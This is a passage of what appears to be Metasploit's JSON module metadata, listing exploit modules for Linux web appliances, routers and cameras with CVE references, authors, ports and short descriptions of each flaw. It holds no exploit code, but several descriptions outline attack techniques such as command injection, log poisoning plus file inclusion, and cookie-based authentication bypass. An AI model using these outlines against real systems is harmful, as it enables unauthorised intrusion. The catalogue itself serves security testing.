"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "This module takes advantage of two vulnerabilities in order to gain remote code execution as root\n as an otherwise non-privileged authorized user. By taking advantage of a mass assignment\n vulnerability that allows an unprivileged authenticated user to change the administrator's\n password hash, the module updates the password to login as the admin to reach the second vulnerability.\n No server-side sanitization is done on values passed when configuring a static network interface.\n This allows an administrator user to run arbitrary commands in the context of the web application,\n which is root when configuring the network interface. This module will inadvertently delete\n any other users that may have been present as a side effect of changing the admin's password.",
"references": [
"CVE-2014-2849",
"CVE-2014-2850",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-14-069/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Sophos Web Protection Appliance 3.8.1.1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/sophos_wpa_iface_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/sophos_wpa_iface_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/sophos_wpa_sblistpack_exec": {
"name": "Sophos Web Protection Appliance sblistpack Arbitrary Command Execution",
"full_name": "exploit/linux/http/sophos_wpa_sblistpack_exec",
"rank": 600,
"disclosure_date": "2013-09-06",
"type": "exploit",
"author": [
"Francisco Falcon",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on Sophos Web Protection Appliance\n 3.7.9, 3.8.0 and 3.8.1. The vulnerability exists on the sblistpack component, reachable\n from the web interface without authentication. This module has been tested successfully\n on Sophos Virtual Web Appliance 3.7.0.",
"references": [
"CVE-2013-4983",
"OSVDB-97029",
"BID-62263",
"EDB-28175",
"URL-http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Sophos Web Protection Appliance 3.7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/sophos_wpa_sblistpack_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/spark_unauth_rce": {
"name": "Apache Spark Unauthenticated Command Execution",
"full_name": "exploit/linux/http/spark_unauth_rce",
"rank": 600,
"disclosure_date": "2017-12-12",
"type": "exploit",
"author": [
"Fengwei Zhang",
"Imran Rashid",
"aRe00t",
"Green-m <greenm.xxoo@gmail.com>"
],
"description": "This module exploits an unauthenticated command execution vulnerability in Apache Spark with standalone cluster mode through REST API.\n It uses the function CreateSubmissionRequest to submit a malicious Java class and trigger it.",
"references": [
"CVE-2018-11770",
"URL-https://www.jianshu.com/p/a080cb323832",
"URL-https://github.com/vulhub/vulhub/tree/master/spark/unacc"
],
"platform": "Java",
"arch": "java",
"rport": 6066,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-14 15:28:08 +0000",
"path": "/modules/exploits/linux/http/spark_unauth_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/spark_unauth_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_linux/http/supervisor_xmlrpc_exec": {
"name": "Supervisor XML-RPC Authenticated Remote Code Execution",
"full_name": "exploit/linux/http/supervisor_xmlrpc_exec",
"rank": 600,
"disclosure_date": "2017-07-19",
"type": "exploit",
"author": [
"Calum Hutton <c.e.hutton@gmx.com>"
],
"description": "This module exploits a vulnerability in the Supervisor process control software, where an authenticated client\n can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.\n The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this\n may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been\n configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.",
"references": [
"URL-https://github.com/Supervisor/supervisor/issues/964",
"URL-https://www.debian.org/security/2017/dsa-3942",
"URL-https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610",
"URL-https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610",
"CVE-2017-11610"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 9001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"3.0a1-3.3.2"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/supervisor_xmlrpc_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_messaging_gateway_exec": {
"name": "Symantec Messaging Gateway Remote Code Execution",
"full_name": "exploit/linux/http/symantec_messaging_gateway_exec",
"rank": 600,
"disclosure_date": "2017-04-26",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a command injection vulnerability in the Symantec Messaging Gateway product. An authenticated user can execute a\n terminal command under the context of the web server user, which is root.\n\n The backupNow.do endpoint takes several user inputs and then passes them to the internal service which is responsible for executing\n operating system commands. One of the user inputs is passed to the service without proper validation, which causes a command\n injection vulnerability. However, other parameters, such as the SSH IP address, port and credentials, are validated before the terminal\n command is executed. Thus, you need to configure your own SSH service and set the required parameter during module usage.\n\n This module was tested against Symantec Messaging Gateway 10.6.2-7.",
"references": [
"URL-https://pentest.blog/unexpected-journey-5-from-weak-password-to-rce-on-symantec-messaging-gateway/",
"CVE-2017-6326"
],
"platform": "Python",
"arch": "python",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/http/symantec_messaging_gateway_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_messaging_gateway_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_web_gateway_exec": {
"name": "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",
"full_name": "exploit/linux/http/symantec_web_gateway_exec",
"rank": 600,
"disclosure_date": "2012-05-17",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in Symantec Web\n Gateway's HTTP service due to the insecure usage of the exec() function. This module\n abuses the spywall/ipchange.php file to execute arbitrary OS commands without\n authentication.",
"references": [
"CVE-2012-0297",
"OSVDB-82925",
"BID-53444",
"ZDI-12-090",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Web Gateway 5.0.2.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/symantec_web_gateway_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_web_gateway_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_web_gateway_file_upload": {
"name": "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",
"full_name": "exploit/linux/http/symantec_web_gateway_file_upload",
"rank": 600,
"disclosure_date": "2012-05-17",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a file upload vulnerability found in Symantec Web Gateway's\n HTTP service. Due to the incorrect use of file extensions in the upload_file()\n function, attackers may abuse the spywall/blocked_file.php file in order to\n upload a malicious PHP file without any authentication, which results in arbitrary\n code execution.",
"references": [
"CVE-2012-0299",
"OSVDB-82025",
"BID-53443",
"ZDI-12-091",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Web Gateway 5.0.2.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_web_gateway_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_web_gateway_lfi": {
"name": "Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability",
"full_name": "exploit/linux/http/symantec_web_gateway_lfi",
"rank": 600,
"disclosure_date": "2012-05-17",
"type": "exploit",
"author": [
"Unknown",
"muts",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Symantec Web Gateway's HTTP\n service. By injecting PHP code in the access log, it is possible to load it\n with a directory traversal flaw, which allows remote code execution under the\n context of 'apache'. Please note that it may take up to several minutes to\n retrieve access_log, which is about the amount of time required to see a shell\n back.",
"references": [
"CVE-2012-0297",
"OSVDB-82023",
"EDB-18932",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Web Gateway 5.0.2.8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/symantec_web_gateway_lfi.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_web_gateway_lfi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_web_gateway_pbcontrol": {
"name": "Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection",
"full_name": "exploit/linux/http/symantec_web_gateway_pbcontrol",
"rank": 600,
"disclosure_date": "2012-07-23",
"type": "exploit",
"author": [
"muts",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in Symantec Web\n Gateway's HTTP service. While handling the filename parameter, the Spywall API\n does not do any filtering before passing it to an exec() call in proxy_file(),\n thus resulting in remote code execution under the context of the web server. Please\n note authentication is NOT needed to gain access.",
"references": [
"CVE-2012-2953",
"OSVDB-84120",
"BID-54426",
"EDB-20088",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Web Gateway 5.0.2.18"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/symantec_web_gateway_pbcontrol.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_web_gateway_pbcontrol",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/symantec_web_gateway_restore": {
"name": "Symantec Web Gateway 5 restore.php Post Authentication Command Injection",
"full_name": "exploit/linux/http/symantec_web_gateway_restore",
"rank": 600,
"disclosure_date": "2014-12-16",
"type": "exploit",
"author": [
"Egidio Romano",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability found in Symantec Web\n Gateway's setting restoration feature. The filename portion can be used to inject\n system commands into a syscall function, and gain control under the context of\n HTTP service.\n\n For Symantec Web Gateway 5.1.1, you can exploit this vulnerability as any kind of user.\n However, for version 5.2.1, you must be an administrator.",
"references": [
"CVE-2014-7285",
"OSVDB-116009",
"BID-71620",
"URL-http://karmainsecurity.com/KIS-2014-19",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Symantec Web Gateway 5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/symantec_web_gateway_restore.rb",
"is_install_path": true,
"ref_name": "linux/http/symantec_web_gateway_restore",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/synology_dsm_sliceupload_exec_noauth": {
"name": "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
"full_name": "exploit/linux/http/synology_dsm_sliceupload_exec_noauth",
"rank": 600,
"disclosure_date": "2013-10-31",
"type": "exploit",
"author": [
"Markus Wulftange"
],
"description": "This module exploits a vulnerability found in Synology DiskStation Manager (DSM)\n versions 4.x, which allows the execution of arbitrary commands under root\n privileges.\n The vulnerability is located in /webman/imageSelector.cgi, which allows appending\n arbitrary data to a given file using so-called SLICEUPLOAD functionality, which\n can be triggered by an unauthenticated user with a specially crafted HTTP request.\n This is exploited by this module to append the given commands to /redirect.cgi,\n which is a regular shell script file, and can be invoked with another HTTP request.\n Synology reported that the vulnerability has been fixed with versions 4.0-2259,\n 4.2-3243, and 4.3-3810 Update 1, respectively; the 4.1 branch remains vulnerable.",
"references": [
"CVE-2013-6955",
"OSVDB-101247"
],
"platform": "Unix",
"arch": "cmd",
"rport": 5000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb",
"is_install_path": true,
"ref_name": "linux/http/synology_dsm_sliceupload_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/tiki_calendar_exec": {
"name": "Tiki-Wiki CMS Calendar Command Execution",
"full_name": "exploit/linux/http/tiki_calendar_exec",
"rank": 600,
"disclosure_date": "2016-06-06",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"Dany Ouellet"
],
"description": "Tiki-Wiki CMS's calendar module contains a remote code execution\n vulnerability within the viewmode GET parameter.\n The calendar module is NOT enabled by default. If enabled,\n the default permissions are set to NOT allow anonymous users\n to access.\n\n Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14\n Verified/Tested against 14.1",
"references": [
"EDB-39965",
"URL-https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/tiki_calendar_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/tiki_calendar_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/tp_link_sc2020n_authenticated_telnet_injection": {
"name": "TP-Link SC2020n Authenticated Telnet Injection",
"full_name": "exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection",
"rank": 600,
"disclosure_date": "2015-12-20",
"type": "exploit",
"author": [
"Nicholas Starke <nick@alephvoid.com>"
],
"description": "The TP-Link SC2020n Network Video Camera is vulnerable\n to OS Command Injection via the web interface. By firing up the telnet daemon,\n it is possible to gain root on the device. The vulnerability\n exists at /cgi-bin/admin/servetest, which is accessible with credentials.",
"references": [
"CVE-2013-2578"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
23,
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"telnet",
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb",
"is_install_path": true,
"ref_name": "linux/http/tp_link_sc2020n_authenticated_telnet_injection",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/tr064_ntpserver_cmdinject": {
"name": "Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064",
"full_name": "exploit/linux/http/tr064_ntpserver_cmdinject",
"rank": 300,
"disclosure_date": "2016-11-07",
"type": "exploit",
"author": [
"Kenzo",
"Michael Messner <devnull@s3cur1ty.de>",
"todb <todb@metasploit.com>",
"wvu <wvu@metasploit.com>",
"0x27"
],
"description": "Broadband DSL modems manufactured by Zyxel and distributed by some\n European ISPs are vulnerable to a command injection vulnerability when setting\n the 'NewNTPServer' value using the TR-064 SOAP-based configuration protocol. In\n the tested case, no authentication is required to set this value on affected\n DSL modems.\n\n This exploit was originally tested on firmware versions up to 2.00(AADU.5)_20150909.",
"references": [
"CVE-2016-10372",
"EDB-40740",
"URL-https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/",
"URL-https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759",
"URL-https://broadband-forum.org/technical/download/TR-064.pdf"
],
"platform": "",
"arch": "",
"rport": 7547,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MIPS Big Endian",
"MIPS Little Endian"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/http/tr064_ntpserver_cmdinject.rb",
"is_install_path": true,
"ref_name": "linux/http/tr064_ntpserver_cmdinject",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/trend_micro_imsva_exec": {
"name": "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
"full_name": "exploit/linux/http/trend_micro_imsva_exec",
"rank": 600,
"disclosure_date": "2017-01-15",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a command injection vulnerability in the Trend Micro\n IMSVA product. An authenticated user can execute a terminal command under\n the context of the web server user, which is root. Additionally, the default installation\n of IMSVA comes with default administrator credentials.\n\n The saveCert.imss endpoint takes several user inputs and performs blacklisting.\n After that, it uses them as arguments of a predefined operating system command\n without proper sanitization. However, due to an improper blacklisting rule, it is possible to inject\n arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 is affected by this issue.\n\n This module was tested against IMSVA 9.1-1600.",
"references": [
"CVE-2017-6398",
"URL-https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/"
],
"platform": "Python",
"arch": "python",
"rport": 8445,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/http/trend_micro_imsva_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/trend_micro_imsva_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/trendmicro_imsva_widget_exec": {
"name": "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution",
"full_name": "exploit/linux/http/trendmicro_imsva_widget_exec",
"rank": 600,
"disclosure_date": "2017-10-07",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits an authentication bypass and a command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro IMSVA product\n has a widget feature which is implemented in PHP. An insecurely configured web server exposes the diagnostic.log file, which\n leads to the extraction of the JSESSIONID value from an administrator session. The Proxy.php file under the mod TMCSS folder takes multiple parameters, but the process\n does not properly validate a user-supplied string before using it to execute a system call. Due to the combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.",
"references": [
"URL-https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-17-521/"
],
"platform": "Python",
"arch": "python",
"rport": 8445,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-10 09:37:24 +0000",
"path": "/modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/trendmicro_imsva_widget_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/trendmicro_sps_exec": {
"name": "Trend Micro Smart Protection Server Exec Remote Code Injection",
"full_name": "exploit/linux/http/trendmicro_sps_exec",
"rank": 600,
"disclosure_date": "2016-08-08",
"type": "exploit",
"author": [
"Quentin Kaiser <kaiserquentin@gmail.com>"
],
"description": "This module exploits a vulnerability found in TrendMicro Smart Protection Server where untrusted inputs are fed to the ServWebExec system command, leading to command injection.\n Please note: authentication is required to exploit this vulnerability.",
"references": [
"CVE-2016-6267"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/linux/http/trendmicro_sps_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/trendmicro_sps_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/trueonline_billion_5200w_rce": {
"name": "TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection",
"full_name": "exploit/linux/http/trueonline_billion_5200w_rce",
"rank": 600,
"disclosure_date": "2016-12-26",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "TrueOnline is a major ISP in Thailand, and it distributes a customized version of\n the Billion 5200W-T router. This customized version has at least two command injection\n vulnerabilities, one authenticated and one unauthenticated, on different firmware versions.\n This module will attempt to exploit the unauthenticated injection first, and if that fails,\n it will attempt to exploit the authenticated injection.\n This module was tested in an emulated environment, as the author doesn't have access to the\n Thai router any more. Any feedback should be sent directly to the module's author, as well as\n to the Metasploit project.\n There are other language strings in the firmware, so it is likely that this firmware is not\n only distributed in Thailand. Other Billion 5200W-T in other countries might be vulnerable too.",
"references": [
"URL-https://seclists.org/fulldisclosure/2017/Jan/40",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
"URL-https://blogs.securiteam.com/index.php/archives/2910"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Billion 5200W-T"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/trueonline_billion_5200w_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/trueonline_billion_5200w_rce",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/trueonline_p660hn_v1_rce": {
"name": "TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection",
"full_name": "exploit/linux/http/trueonline_p660hn_v1_rce",
"rank": 600,
"disclosure_date": "2016-12-26",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "TrueOnline is a major ISP in Thailand, and it distributes a customized version of\n the ZyXEL P660HN-T v1 router. This customized version has an unauthenticated command\n injection vulnerability in the remote log forwarding page.\n This module was tested in an emulated environment, as the author doesn't have access to the\n Thai router any more. Any feedback should be sent directly to the module's author, as well as\n to the Metasploit project.\n There are other language strings in the firmware, so it is likely that this firmware is not only\n distributed in Thailand. Other P660HN-T v1 in other countries might be vulnerable too.",
"references": [
"URL-https://seclists.org/fulldisclosure/2017/Jan/40",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
"URL-https://blogs.securiteam.com/index.php/archives/2910"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"P660HN-T v1"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/trueonline_p660hn_v1_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/trueonline_p660hn_v1_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/trueonline_p660hn_v2_rce": {
"name": "TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection",
"full_name": "exploit/linux/http/trueonline_p660hn_v2_rce",
"rank": 600,
"disclosure_date": "2016-12-26",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "TrueOnline is a major ISP in Thailand, and it distributes a customized version of\n the ZyXEL P660HN-T v2 router. This customized version has an authenticated command injection\n vulnerability in the remote log forwarding page. This can be exploited using the \"supervisor\"\n account that comes with a default password on the device.\n This module was tested in an emulated environment, as the author doesn't have access to the\n Thai router any more. Any feedback should be sent directly to the module's author, as well as\n to the Metasploit project. Note that the inline payloads work best.\n There are Turkish and other language strings in the firmware, so it is likely that this\n firmware is not only distributed in Thailand. Other P660HN-T v2 in other countries might be\n vulnerable too.",
"references": [
"URL-https://seclists.org/fulldisclosure/2017/Jan/40",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
"URL-https://blogs.securiteam.com/index.php/archives/2910"
],
"platform": "Linux",
"arch": "mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"P660HN-T v2"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/http/trueonline_p660hn_v2_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/trueonline_p660hn_v2_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/http/ueb_api_rce": {
"name": "Unitrends UEB http api remote code execution",
"full_name": "exploit/linux/http/ueb_api_rce",
"rank": 600,
"disclosure_date": "2017-08-08",
"type": "exploit",
"author": [
"Cale Smith",
"Benny Husted",
"Jared Arave",
"h00die"
],
"description": "It was discovered that the api/storage web interface in Unitrends Backup (UB)\n before 10.0.0 has an issue in which one of its input parameters was not validated.\n A remote attacker could use this flaw to bypass authentication and execute arbitrary\n commands with root privilege on the target system.\n UEB v9 runs the api under root privileges and api/storage is vulnerable.\n UEB v10 runs the api under limited privileges and api/hosts is vulnerable.",
"references": [
"URL-https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756",
"URL-https://support.unitrends.com/UnitrendsBackup/s/article/000006002",
"URL-https://nvd.nist.gov/vuln/detail/CVE-2017-12478",
"URL-http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html",
"EDB-44297",
"CVE-2017-12478",
"CVE-2018-6328"
],
"platform": "Linux",
"arch": "x86",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"UEB 9.*",
"UEB < 10.1.0"
],
"mod_time": "2019-01-09 20:28:53 +0000",
"path": "/modules/exploits/linux/http/ueb_api_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/ueb_api_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/vap2500_tools_command_exec": {
"name": "Arris VAP2500 tools_command.php Command Execution",
"full_name": "exploit/linux/http/vap2500_tools_command_exec",
"rank": 300,
"disclosure_date": "2014-11-25",
"type": "exploit",
"author": [
"HeadlessZeke"
],
"description": "Arris VAP2500 access points are vulnerable to OS command injection in the web management\n portal via the tools_command.php page. Though authentication is required to access this\n page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid\n username.",
"references": [
"CVE-2014-8423",
"CVE-2014-8424",
"OSVDB-115045",
"OSVDB-115046",
"BID-71297",
"BID-71299",
"URL-http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/http/vap2500_tools_command_exec.rb",
"is_install_path": true,
"ref_name": "linux/http/vap2500_tools_command_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/http/vcms_upload": {
"name": "V-CMS PHP File Upload and Execute",
"full_name": "exploit/linux/http/vcms_upload",
"rank": 600,
"disclosure_date": "2011-11-27",
"type": "exploit",
"author": [
